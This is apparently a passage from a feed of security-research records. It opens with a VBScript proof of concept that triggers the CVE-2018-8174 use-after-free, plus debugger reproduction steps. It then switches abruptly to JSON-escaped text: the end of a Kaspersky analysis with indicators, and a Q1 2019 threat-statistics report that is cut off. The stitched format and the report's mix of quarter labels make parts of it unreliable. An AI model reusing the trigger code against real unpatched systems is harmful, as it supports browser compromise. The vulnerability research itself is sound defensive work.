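     Added example, not the exploit's own code. Intended for a lab VM with an
     unpatched (pre-May 2018) vbscript.dll: loaded in Internet Explorer with
     page heap enabled, the expected result is an access violation inside
     OLEAUT32!VariantClear while ArrB is being erased. -->
<html>
<head>
<script language="VBScript">
Dim ArrA
Dim ArrB

' The vulnerable class. Its Class_Terminate runs from VBScriptClass::TerminateClass,
' which Release calls AFTER it has already performed its single refCount check.
Class ClassVuln
    Private Sub Class_Terminate()
        ' Take a second reference to the object that is being destroyed.
        ' refCount goes up here, but Release never re-checks it once
        ' TerminateClass returns, so the object is freed anyway and
        ' ArrB(1) is left pointing at freed memory.
        Set ArrB(1) = ArrA(1)
    End Sub
End Class

Sub TriggerVuln
    ' Two arrays of VARIANTs (FADF_VARIANT SafeArrays); only index 1 is used.
    ArrA = Array(0, 0)
    ArrB = Array(0, 0)

    ' ArrA(1) now holds the only reference to a ClassVuln (VT_DISPATCH).
    Set ArrA(1) = New ClassVuln

    ' VbsErase -> SafeArrayDestroy -> ReleaseResources -> VariantClear ->
    ' VBScriptClass::Release -> TerminateClass (runs Class_Terminate above),
    ' then frees the object despite the reference that was just added.
    Erase ArrA

    ' Destroying ArrB clears the dangling VT_DISPATCH in ArrB(1): Release is
    ' invoked on freed memory and a virtual call through a stale vtable faults.
    Erase ArrB
End Sub

TriggerVuln
</script>
</head>
<body></body>
</html>
```

To reproduce the crash the way the text describes it, enable full page heap for the browser process with the Windows SDK gflags tool (`gflags /p /enable iexplore.exe /full`) and attach a debugger before loading the page; without page heap the freed chunk is often reused silently and the fault may not surface. On a vbscript.dll carrying the CVE-2018-8174 fix the script simply completes, and on current Windows builds VBScript is disabled in Internet Explorer altogether, so nothing runs.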
When execution continues and ArrB is erased, the whole cycle repeats, except that this time ArrB(1) references a freed ClassVuln object, and we observe a crash when one of the virtual methods in the ClassVuln vtable is called.\n\n### **Conclusion**\n\nIn this write-up we analyzed the core reasons behind CVE-2018-8174, a particularly interesting use-after-free vulnerability made possible by incorrect object lifetime handling around the Class_Terminate VBScript method. The exploitation process differs from what we have seen in exploits for older vulnerabilities (CVE-2016-0189 and CVE-2014-6332), as the Godmode technique is no longer used. The full exploitation chain is as interesting as the vulnerability itself, but is out of scope for this article.\n\nWith CVE-2018-8174 being the first public exploit to use a URL moniker to load an IE exploit from Word, we believe that this technique, unless fixed, will be heavily abused by attackers in the future, as it forces Internet Explorer to load the page regardless of the default browser settings on the victim's system.\n\nWe expect this vulnerability to become one of the most exploited in the near future, as it won't be long until exploit kit authors start abusing it in both drive-by (via browser) and spear-phishing (via document) campaigns. To stay protected, we recommend applying the latest security updates and using a security solution with [behavior detection capabilities](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>).\n\nIn our opinion this is the same exploit that the Qihoo360 Core Security Team called \"Double Kill\" in their [recent publication](<https://weibo.com/ttarticle/p/show?id=2309404230886689265523>). 
While this exploit is not limited to browser exploitation, it was reported as an IE zero-day, which caused some confusion in the security community.\n\nAfter finding this exploit we immediately shared the relevant information with Microsoft; they confirmed that it is in fact [CVE-2018-8174](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8174>) and acknowledged the report.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/10092043/180508-the-king-is-dead-cve-18-20.png>)\n\n_This exploit was found in the wild and was used by an APT actor. More information about that APT actor and usage of the exploit is available to customers of Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com_\n\n### **Detection**\n\nKaspersky Lab products successfully detect and block all stages of the exploitation chain and payload with the following verdicts:\n\n * HEUR:Exploit.MSOffice.Generic \u2013 RTF document\n * PDM:Exploit.Win32.Generic \u2013 IE exploit, detection with [Automatic Exploit Prevention technology](<https://www.kaspersky.com/enterprise-security/wiki-section/products/automatic-exploit-prevention-aep>)\n * HEUR:Exploit.Script.Generic \u2013 IE exploit\n * HEUR:Trojan.Win32.Generic \u2013 Payload\n\n### **IOCs**\n\n * b48ddad351dd16e4b24f3909c53c8901 \u2013 RTF document\n * 15eafc24416cbf4cfe323e9c271e71e7 \u2013 Internet Explorer exploit (CVE-2018-8174)\n * 1ce4a38b6ea440a6734f7c049f5c47e2 \u2013 Payload\n * autosoundcheckers[.]com", "modified": "2018-05-09T06:00:56", "published": "2018-05-09T06:00:56", "id": "SECURELIST:4FE9AF32AEB194433587B75288D50FDA", "href": "https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/", "type": "securelist", "title": "The King is dead. 
Long live the King!", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T14:29:14", "bulletinFamily": "blog", "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-20250", "CVE-2019-0797", "CVE-2019-0808", "CVE-2019-5786"], "description": "\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network,\n\n * Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources in 203 countries across the globe.\n * 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 243,604 users.\n * Ransomware attacks were defeated on the computers of 284,489 unique users.\n * Our File Anti-Virus detected 247,907,593 unique malicious and potentially unwanted objects.\n * Kaspersky Lab products for mobile devices detected: \n * 905,174 malicious installation packages\n * 29,841 installation packages for mobile banking Trojans\n * 27,928 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Quarterly highlights\n\nQ1 2019 is remembered mainly for mobile financial threats.\n\nFirst, the operators of the Russia-targeting Asacub Trojan made several large-scale distribution attempts, reaching up to 13,000 unique users per day. The attacks used active bots to send malicious links to contacts in already infected smartphones. 
The mailings contained one of the following messages:\n\n_{Name of victim}, you received a new mms: ____________________________ from {Name of victim's contact}_ \n_{Name of victim}, the mms: smsfn.pro/3ftjR was received from {Name of victim's contact}_ \n_{Name of victim}, photo: smslv.pro/c0Oj0 received from {Name of victim's contact}_ \n_{Name of victim}, you have an mms notification ____________________________ from {Name of victim's contact}_\n\nSecond, the start of the year saw a rise in the number of malicious apps in the Google Play store aimed at stealing credentials from users of Brazilian online banking apps.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172941/it-threat-stats-q1-2019-1.png>)\n\nAlthough such malware appeared on the most popular app platform, the number of downloads was extremely low. We are inclined to believe that cybercriminals are having problems luring victims to pages with malicious apps.\n\n### Mobile threat statistics\n\nIn Q1 2019, Kaspersky Lab detected 905,174 malicious installation packages, which is 95,845 packages down on the previous quarter.\n\n_Number of detected malicious installation packages, Q2 2018 \u2013 Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171046/mobile-malware-apk.png>)\n\n#### Distribution of detected mobile apps by type\n\n_Distribution of newly detected mobile apps by type, Q4 2018 and Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171122/infographic.png>)\n\nAmong all the threats detected in Q1 2019, the lion's share went to potentially unwanted RiskTool apps with 29.80%, a fall of 19 p.p. against the previous quarter. 
The most frequently encountered objects came from the RiskTool.AndroidOS.Dnotua (28% of all detected threats of this class), RiskTool.AndroidOS.Agent (27%), and RiskTool.AndroidOS.SMSreg (16%) families.\n\nIn second place were threats in the Trojan-Dropper class (24.93%), whose share increased by 13 p.p. The vast majority of files detected belonged to the Trojan-Dropper.AndroidOS.Wapnor family (93% of all detected threats of this class). Next came the Trojan-Dropper.AndroidOS.Agent (3%) and Trojan-Dropper.AndroidOS.Hqwar (2%) families, and others.\n\nThe share of advertising apps (adware) doubled compared to Q4 2018. The AdWare.AndroidOS.Agent (44.44% of all threats of this class), AdWare.AndroidOS.Ewind (35.93%), and AdWare.AndroidOS.Dnotua (4.73%) families were the biggest contributors.\n\nThe statistics show a significant rise in the number of mobile financial threats in Q1 2019. If in Q4 2018 the share of mobile banking Trojans was 1.85%, in Q1 2019 the figure stood at 3.24% of all detected threats.\n\nThe most common objects belonged to the Trojan-Banker.AndroidOS.Svpeng (20% of all detected mobile bankers), Trojan-Banker.AndroidOS.Asacub (18%), and Trojan-Banker.AndroidOS.Agent (15%) families.\n\n### Top 20 mobile malware programs\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware._\n\n| **Verdict ** | **%*** \n---|---|--- \n1 | DangerousObject.Multi.Generic | 54.26 \n2 | Trojan.AndroidOS.Boogr.gsh | 12.72 \n3 | Trojan-Banker.AndroidOS.Asacub.snt | 4.98 \n4 | DangerousObject.AndroidOS.GenericML | 4.35 \n5 | Trojan-Banker.AndroidOS.Asacub.a | 3.49 \n6 | Trojan-Dropper.AndroidOS.Hqwar.bb | 3.36 \n7 | Trojan-Dropper.AndroidOS.Lezok.p | 2.60 \n8 | Trojan-Banker.AndroidOS.Agent.ep | 2.53 \n9 | Trojan.AndroidOS.Dvmap.a | 1.84 \n10 | Trojan-Banker.AndroidOS.Svpeng.q | 1.83 \n11 | Trojan-Banker.AndroidOS.Asacub.cp | 1.78 \n12 | Trojan.AndroidOS.Agent.eb | 1.74 \n13 | 
Trojan.AndroidOS.Agent.rt | 1.72 \n14 | Trojan-Banker.AndroidOS.Asacub.ce | 1.70 \n15 | Trojan-SMS.AndroidOS.Prizmes.a | 1.66 \n16 | Exploit.AndroidOS.Lotoor.be | 1.59 \n17 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.57 \n18 | Trojan-Dropper.AndroidOS.Tiny.d | 1.51 \n19 | Trojan-Banker.AndroidOS.Svpeng.ak | 1.49 \n20 | Trojan.AndroidOS.Triada.dl | 1.47 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked._\n\nAs is customary, first place in the Top 20 for Q1 went to the DangerousObject.Multi.Generic verdict (54.26%), which we use for malware detected using [cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company's cloud already contains information about the object. This is basically how the latest malicious programs are detected.\n\nIn second place came Trojan.AndroidOS.Boogr.gsh (12.72%). This verdict is assigned to files recognized as malicious by our system [based on machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nThird place went to the Trojan-Banker.AndroidOS.Asacub.snt banker (4.98%). In Q1, this family was well represented in our Top 20: four positions out of 20 (3rd, 5th, 11th, 14th).\n\nThe DangerousObject.AndroidOS.GenericML verdict (4.35%), which ranked fourth in Q1, is perhaps the most interesting. It is given to files detected by machine learning. But unlike the Trojan.AndroidOS.Boogr.gsh verdict, which is assigned to malware that is processed and detected inside Kaspersky Lab's infrastructure, the DangerousObject.AndroidOS.GenericML verdict is given to files on the side of users of the company's security solutions before such files go for processing. 
The latest threat patterns are now detected this way.\n\nSixth and seventeenth places were taken by members of the Hqwar dropper family: Trojan-Dropper.AndroidOS.Hqwar.bb (3.36%) and Trojan-Dropper.AndroidOS.Hqwar.gen (1.57%), respectively. These packers most often contain banking Trojans, including Asacub.\n\nSeventh position belonged to Trojan-Dropper.AndroidOS.Lezok.p (2.60%). The Lezok family is notable for its variety of distribution schemes, among them a supply chain attack, whereby the malware is embedded in the firmware of the mobile device before delivery to the store. This is very dangerous for two reasons:\n\n * It is extremely difficult for an ordinary user to determine whether their device is already infected.\n * Getting rid of such malware is highly complex.\n\nThe Lezok Trojan family is designed primarily to display persistent ads, sign users up for paid SMS subscriptions, and inflate counters for apps on various platforms.\n\nThe last Trojan worthy of a mention on the topic of the Top 20 mobile threats is Trojan-Banker.AndroidOS.Agent.ep. It is encountered both in standalone form and inside Hqwar droppers. The malware has extensive capabilities for countering dynamic analysis, and can detect being launched in the Android Emulator or Genymotion environment. It can open arbitrary web pages to phish for login credentials. 
It uses Accessibility Services to obtain various rights and interact with other apps.\n\n### Geography of mobile threats\n\n_Map of mobile malware infection attempts, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172806/en-mobile-malware-map.png>)\n\nTop 10 countries by share of users attacked by mobile malware:\n\n| Country* | %** \n---|---|--- \n1 | Pakistan | 37.54 \n2 | Iran | 31.55 \n3 | Bangladesh | 28.38 \n4 | Algeria | 24.03 \n5 | Nigeria | 22.59 \n6 | India | 21.53 \n7 | Tanzania | 20.71 \n8 | Indonesia | 17.16 \n9 | Kenya | 16.27 \n10 | Mexico | 12.01 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._ \n_** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nPakistan (37.54%) ranked first, with the largest number of users in this country being attacked by AdWare.AndroidOS.Agent.f, AdWare.AndroidOS.Ewind.h, and AdWare.AndroidOS.HiddenAd.et adware.\n\nSecond place was taken by Iran (31.55%), which appears consistently in the Top 10 every quarter. The most commonly encountered malware in this country was Trojan.AndroidOS.Hiddapp.bn, as well as the potentially unwanted apps RiskTool.AndroidOS.Dnotua.yfe and RiskTool.AndroidOS.FakGram.a. Of these three, the latter is the most noteworthy \u2013 the main task of this app is to intercept Telegram messages. 
It should be mentioned that Telegram is banned in Iran, so any of its clones are in demand, as confirmed by the infection statistics.\n\nThird place went to Bangladesh (28.38%), where in Q1 the same advertising apps were weaponized as in Pakistan.\n\n### Mobile banking Trojans\n\nIn the reporting period, we detected **29,841** installation packages for mobile banking Trojans, almost 11,000 more than in Q4 2018.\n\nThe greatest contributions came from the creators of the Trojan-Banker.AndroidOS.Svpeng (20% of all detected banking Trojans), the second-place Trojan-Banker.AndroidOS.Asacub (18%), and the third-place Trojan-Banker.AndroidOS.Agent (15%) families.\n\n_Number of installation packages for mobile banking Trojans, Q2 2018 \u2013 Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171308/banking-malware-apk.png>)\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.snt | 23.32 \n2 | Trojan-Banker.AndroidOS.Asacub.a | 16.35 \n3 | Trojan-Banker.AndroidOS.Agent.ep | 11.82 \n4 | Trojan-Banker.AndroidOS.Svpeng.q | 8.57 \n5 | Trojan-Banker.AndroidOS.Asacub.cp | 8.33 \n6 | Trojan-Banker.AndroidOS.Asacub.ce | 7.96 \n7 | Trojan-Banker.AndroidOS.Svpeng.ak | 7.00 \n8 | Trojan-Banker.AndroidOS.Agent.eq | 4.96 \n9 | Trojan-Banker.AndroidOS.Asacub.ar | 2.47 \n10 | Trojan-Banker.AndroidOS.Hqwar.t | 2.10 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked by banking threats._\n\nThis time, fully half the Top 10 banking threats are members of the Trojan-Banker.AndroidOS.Asacub family: five positions out of ten. The creators of this Trojan actively distributed samples throughout Q1. In particular, the number of users attacked by the Asacub.cp Trojan reached 8,200 per day. 
But even this high result was surpassed by Asacub.snt with 13,000 users per day at the peak of the campaign.\n\nIt was a similar story with Trojan-Banker.AndroidOS.Agent.ep: We recorded around 3,000 attacked users per day at its peak. However, by the end of the quarter, the average daily number of attacked unique users had dropped below 1,000. Most likely, this was due not to decreased demand for the Trojan, but to cybercriminals' transition to a two-stage system of infection using Hqwar droppers.\n\n_Geography of mobile banking threats, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171335/en-banking-malware-map.png>)\n\n**Top 10 countries by share of users attacked by mobile banking Trojans:**\n\n| Country* | %** \n---|---|--- \n1 | Australia | 0.81 \n2 | Turkey | 0.73 \n3 | Russia | 0.64 \n4 | South Africa | 0.35 \n5 | Ukraine | 0.31 \n6 | Tajikistan | 0.25 \n7 | Armenia | 0.23 \n8 | Kyrgyzstan | 0.17 \n9 | US | 0.16 \n10 | Moldova | 0.16 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._ \n_** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky Lab's mobile security solutions in this country._\n\nIn Q1 2019, Australia (0.81%) took first place in our Top 10. The most common infection attempts we registered in this country were by Trojan-Banker.AndroidOS.Agent.eq and Trojan-Banker.AndroidOS.Agent.ep. 
Neither is exclusive to Australia; both are used in attacks worldwide.\n\nSecond place was taken by Turkey (0.73%), where, as in Australia, Trojan-Banker.AndroidOS.Agent.ep was most often detected.\n\nRussia is in third place (0.64%); there we most frequently detected malware from the Asacub and Svpeng families.\n\n### Mobile ransomware\n\nIn Q1 2019, we detected **27,928** installation packages of mobile ransomware, which is 3,900 more than in the previous quarter.\n\n_Number of mobile ransomware installation packages detected by Kaspersky Lab (Q2 2018 \u2013 Q1 2019)_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171455/mobile-ransomware.png>)\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.ah | 28.91 \n2 | Trojan-Ransom.AndroidOS.Rkor.h | 19.42 \n3 | Trojan-Ransom.AndroidOS.Svpeng.aj | 9.46 \n4 | Trojan-Ransom.AndroidOS.Small.as | 8.81 \n5 | Trojan-Ransom.AndroidOS.Rkor.snt | 5.36 \n6 | Trojan-Ransom.AndroidOS.Svpeng.ai | 5.21 \n7 | Trojan-Ransom.AndroidOS.Small.o | 3.24 \n8 | Trojan-Ransom.AndroidOS.Fusob.h | 2.74 \n9 | Trojan-Ransom.AndroidOS.Small.ce | 2.49 \n10 | Trojan-Ransom.AndroidOS.Svpeng.snt | 2.33 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked by ransomware._\n\nIn Q1 2019, the most common mobile ransomware family was Svpeng, with four positions in the Top 10.\n\n_Geography of mobile ransomware, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171523/en-mobile-ransomware-map.png>)\n\nTop 10 countries by share of users attacked by mobile ransomware:\n\n| Country* | %** \n---|---|--- \n1 | US | 1.54 \n2 | Kazakhstan | 0.36 \n3 | Iran | 0.28 \n4 | Pakistan | 0.14 \n5 | Mexico | 0.10 \n6 | Saudi Arabia | 0.10 \n7 | Canada | 0.07 \n8 | Italy | 0.07 \n9 | Indonesia | 0.05 \n10 | Belgium | 0.05 \n \n_* Excluded from the rating are 
countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._ \n_** Unique users attacked by mobile ransomware as a percentage of all users of Kaspersky Lab's mobile security solutions in this country._\n\nThe Top 3 countries by number of users attacked by mobile ransomware, as in the previous quarter, were the US (1.54%), Kazakhstan (0.36%), and Iran (0.28%).\n\n## Attacks on Apple macOS\n\nOn the topic of threats to various platforms, such a popular system as macOS cannot be ignored. Although new malware families for this platform are relatively rare, threats do exist for it, largely in the shape of adware.\n\nThe modus operandi of such apps is widely known: infect the victim, establish persistence in the system, and show advertising banners. That said, for each ad displayed and banner clicked the attackers receive a very modest fee, so they need:\n\n 1. The code that displays the advertising banner to run as often as possible on the infected machine,\n 2. The victim to click on the banners as often as possible,\n 3. As many victims as possible.\n\nIt should be noted that the adware infection technique and adware behavior on the infected machine at times differ little from malware. 
Meanwhile, the banners themselves can be shown in an arbitrary place on the screen at any time, be it in an open browser window, in a separate window in the center of the screen, etc.\n\n### Top 20 threats for macOS\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Downloader.OSX.Shlayer.a | 24.62 \n2 | AdWare.OSX.Spc.a | 20.07 \n3 | AdWare.OSX.Pirrit.j | 10.31 \n4 | AdWare.OSX.Pirrit.p | 8.44 \n5 | AdWare.OSX.Agent.b | 8.03 \n6 | AdWare.OSX.Pirrit.o | 7.45 \n7 | AdWare.OSX.Pirrit.s | 6.88 \n8 | AdWare.OSX.Agent.c | 6.03 \n9 | AdWare.OSX.MacSearch.a | 5.95 \n10 | AdWare.OSX.Cimpli.d | 5.72 \n11 | AdWare.OSX.Mcp.a | 5.71 \n12 | AdWare.OSX.Pirrit.q | 5.55 \n13 | AdWare.OSX.MacSearch.d | 4.48 \n14 | AdWare.OSX.Agent.a | 4.39 \n15 | Downloader.OSX.InstallCore.ab | 3.88 \n16 | AdWare.OSX.Geonei.ap | 3.75 \n17 | AdWare.OSX.MacSearch.b | 3.48 \n18 | AdWare.OSX.Geonei.l | 3.42 \n19 | AdWare.OSX.Bnodlero.q | 3.33 \n20 | RiskTool.OSX.Spigot.a | 3.12 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky Lab's security solutions for macOS that were attacked._\n\nTrojan-Downloader.OSX.Shlayer.a (24.62%) finished first in our ranking of macOS threats. Malware from the Shlayer family is distributed under the guise of Flash Player or its updates. Its main task is to download and install various advertising apps, including Bnodlero.\n\nAdWare.OSX.Spc.a (20.07%) and AdWare.OSX.Mcp.a (5.71%) are typical adware apps that are distributed together with various \"cleaner\" programs for macOS. After installation, they register themselves to launch at startup and run in the background.\n\nMembers of the AdWare.OSX.Pirrit family add extensions to the victim's browser; some versions also install a proxy server on the victim's machine to intercept traffic from the browser. 
All this serves one purpose \u2013 to inject advertising into web pages viewed by the user.\n\nThe malware group consisting of AdWare.OSX.Agent.a, AdWare.OSX.Agent.b, and AdWare.OSX.Agent.c is closely related to the Pirrit family, since it often downloads members of the latter. It can download, unpack, and launch arbitrary files, as well as embed JS code with ads into web pages seen by the victim.\n\nAdWare.OSX.MacSearch is another family of advertising apps with extensive tools for interacting with the victim's browser. It can manipulate the browser history (read/write), change the browser search engine to its own, add extensions, and embed advertising banners on pages viewed by the user. Plus, it can download and install other apps without the user's knowledge.\n\nAdWare.OSX.Cimpli.d (5.72%) is able to download and install other advertising apps, but its main purpose is to change the browser home page and install advertising extensions. As with other adware apps, all these actions have the aim of displaying ads in the victim's browser.\n\nThe creators of the not-a-virus:Downloader.OSX.InstallCore family, having long perfected their tricks on Windows, transferred the same techniques to macOS. The typical InstallCore member is in fact an installer (more precisely, a framework for creating an installer with extensive capabilities) for other programs that do not form part of the main InstallCore package and are downloaded separately. Besides legitimate software, it can distribute less salubrious apps, including ones containing aggressive advertising. Among other things, InstallCore is used to distribute DivX Player.\n\nThe AdWare.OSX.Geonei family is one of the oldest adware families for macOS. It employs its authors' own obfuscation techniques to hinder security solutions. 
As is typical for adware programs, its main task is to display ads in the browser by embedding them in the HTML code of the web page.\n\nLike other similar apps, AdWare.OSX.Bnodlero.q (3.33%) installs advertising extensions in the user's browser, and changes the default search engine and home page. What's more, it can download and install other advertising apps.\n\n### Threat geography\n\n| Country* | %** \n---|---|--- \n1 | France | 11.54 \n2 | Spain | 9.75 \n3 | India | 8.83 \n4 | Italy | 8.20 \n5 | US | 8.03 \n6 | Canada | 7.94 \n7 | UK | 7.52 \n8 | Russia | 7.51 \n9 | Brazil | 7.45 \n10 | Mexico | 6.99 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's security solutions for macOS (under 10,000)._ \n_** Unique attacked users as a percentage of all users of Kaspersky Lab's security solutions for macOS in the country._\n\nIn Q1 2019, France (11.54%) took first place in the Top 10. The most common infection attempts we registered in this country came from Trojan-Downloader.OSX.Shlayer.a, AdWare.OSX.Spc.a and AdWare.OSX.Bnodlero.q.\n\nUsers from Spain (9.75%), India (8.83%), and Italy (8.20%) \u2013 who ranked second, third, and fourth, respectively \u2013 most often encountered Trojan-Downloader.OSX.Shlayer.a, AdWare.OSX.Spc.a, AdWare.OSX.Bnodlero.q, AdWare.OSX.Pirrit.j, and AdWare.OSX.Agent.b.\n\nFifth place in the ranking went to the US (8.03%), which saw the same macOS threats as Europe. Note that US residents also had to deal with advertising apps from the Cimpli family.\n\n## IoT attacks\n\n### Interesting events\n\nIn Q1 2019, we noticed several curious features in the behavior of IoT malware. First, some Mirai samples were equipped with a tool for artificial environment detection: if the malware detected it was running in a sandbox, it stopped working. 
The implementation was primitive \u2013 scanning for the presence of procfs.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172955/it-threat-stats-q1-2019-6.png>)\n\nBut we expect it to become more complex in the near future.\n\nSecond, one of the versions of Mirai was spotted to contain a mechanism for clearing the environment of other bots. It works using templates, killing any process whose name matches one of them. Interestingly, Mirai itself ended up in the list of such names (the malware itself does not contain \"mirai\" in its process name):\n\n * dvrhelper\n * dvrsupport\n * **mirai**\n * blade\n * demon\n * hoho\n * hakai\n * satori\n * messiah\n * mips\n\nLastly, a few words about a miner that uses an old exploit for Oracle WebLogic Server; strictly speaking it is not IoT malware but a Linux Trojan.\n\nTaking advantage of the fact that WebLogic Server is cross-platform and can run on a Windows host or under Linux, the cybercriminals embedded checks for different operating systems, and are now attacking Windows hosts along with Linux.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22173014/it-threat-stats-q1-2019-7.png>)\n\n_Section of code responsible for attacking Windows and Linux hosts_\n\n### IoT threat statistics\n\nQ1 demonstrated that there are still many devices in the world that attack each other through telnet. Note, however, that this has nothing to do with the qualities of the protocol itself. It is just that devices or servers managed through SSH are closely monitored by administrators and hosting companies, and any malicious activity is terminated. This is one reason why there are significantly fewer unique addresses attacking via SSH than there are IP addresses from which the telnet attacks come. 
\n\n| Service | %* \n---|--- \nSSH | 17% \nTelnet | 83% \n \n_* Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2019_\n\nNevertheless, cybercriminals are actively using powerful servers to manage their vast botnets. This is seen in the number of sessions in which cybercriminal servers interact with Kaspersky Lab's traps.\n\n| Service | %* \n---|--- \nSSH | 64% \nTelnet | 36% \n \n_* Distribution of cybercriminal working sessions with Kaspersky Lab's traps, Q1 2019_\n\nIf attackers have SSH access to an infected device, they have far greater scope to monetize the infection. In the overwhelming majority of cases involving intercepted sessions, we registered spam mailings, attempts to use our trap as a proxy server, and (least often of all) cryptocurrency mining.\n\n### Telnet-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab's telnet traps, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171650/en-iot-telnet-map.png>)\n\nTop 10 countries where devices were located that carried out telnet-based attacks on Kaspersky Lab's traps.\n\n| Country | %* \n---|---|--- \n1 | Egypt | 13.46 \n2 | China | 13.19 \n3 | Brazil | 11.09 \n4 | Russia | 7.17 \n5 | Greece | 4.45 \n6 | Jordan | 4.14 \n7 | US | 4.12 \n8 | Iran | 3.24 \n9 | India | 3.14 \n10 | Turkey | 2.49 \n \n_* Infected devices in the country as a percentage of the total number of all infected IoT devices attacking via telnet._\n\nIn Q1 2019, Egypt (13.46%) topped the leaderboard by number of unique IP addresses from which attempts were made to attack Kaspersky Lab's traps. 
Second place by a small margin goes to China (13.19%), with Brazil (11.09%) in third.\n\nCybercriminals most often used telnet attacks to infect devices with one of the many Mirai family members.\n\n**Top 10 malware downloaded to infected IoT devices following a successful telnet attack**\n\n| Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 71.39 \n2 | Backdoor.Linux.Mirai.ba | 20.15 \n3 | Backdoor.Linux.Mirai.au | 4.85 \n4 | Backdoor.Linux.Mirai.c | 1.35 \n5 | Backdoor.Linux.Mirai.h | 1.23 \n6 | Backdoor.Linux.Mirai.bj | 0.72 \n7 | Trojan-Downloader.Shell.Agent.p | 0.06 \n8 | Backdoor.Linux.Hajime.b | 0.06 \n9 | Backdoor.Linux.Mirai.s | 0.06 \n10 | Backdoor.Linux.Gafgyt.bj | 0.04 \n \n_* Share of malware in the total amount of malware downloaded to IoT devices following a successful telnet attack_\n\nIt is worth noting that bots based on Mirai code make up most of the Top 10. There is nothing surprising about this, and the situation could persist for a long time given Mirai's universality.\n\n### SSH-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab's SSH traps, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171814/en-iot-ssh-map.png>)\n\nTop 10 countries in which devices were located that carried out SSH-based attacks on Kaspersky Lab's traps.\n\n| Country | %* \n---|---|--- \n1 | China | 23.24 \n2 | US | 9.60 \n3 | Russia | 6.07 \n4 | Brazil | 5.31 \n5 | Germany | 4.20 \n6 | Vietnam | 4.11 \n7 | France | 3.88 \n8 | India | 3.55 \n9 | Egypt | 2.53 \n10 | Korea | 2.10 \n \n_* Infected devices in the country as a percentage of the total number of infected IoT devices attacking via SSH_\n\nMost often, a successful SSH-based attack resulted in one of the following being downloaded to the victim's device: Backdoor.Perl.Shellbot.cd, Backdoor.Perl.Tsunami.gen, and Trojan-Downloader.Shell.Agent.p.\n\n## Financial threats\n\n### Quarterly 
highlights\n\nThe banker Trojan DanaBot, detected in [Q2](<https://securelist.com/it-threat-evolution-q2-2018-statistics/87170/>), continued to grow actively. The new modification not only updated the communication protocol with the C&C center, but expanded the list of organizations targeted by the malware. Whereas last quarter the main targets were located in Australia and Poland, in Q3 organizations in Austria, Germany, and Italy were added.\n\nRecall that DanaBot has a modular structure and can load additional plugins to intercept traffic, steal passwords, and hijack crypto wallets. The malware was distributed through spam mailings with a malicious office document, which was used to download the main body of the Trojan.\n\n### Financial threat statistics\n\nIn Q1 2019, Kaspersky Lab solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 243,604 users.\n\n_Number of unique users attacked by financial malware, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171934/en-finance.png>)\n\n### Attack geography\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, 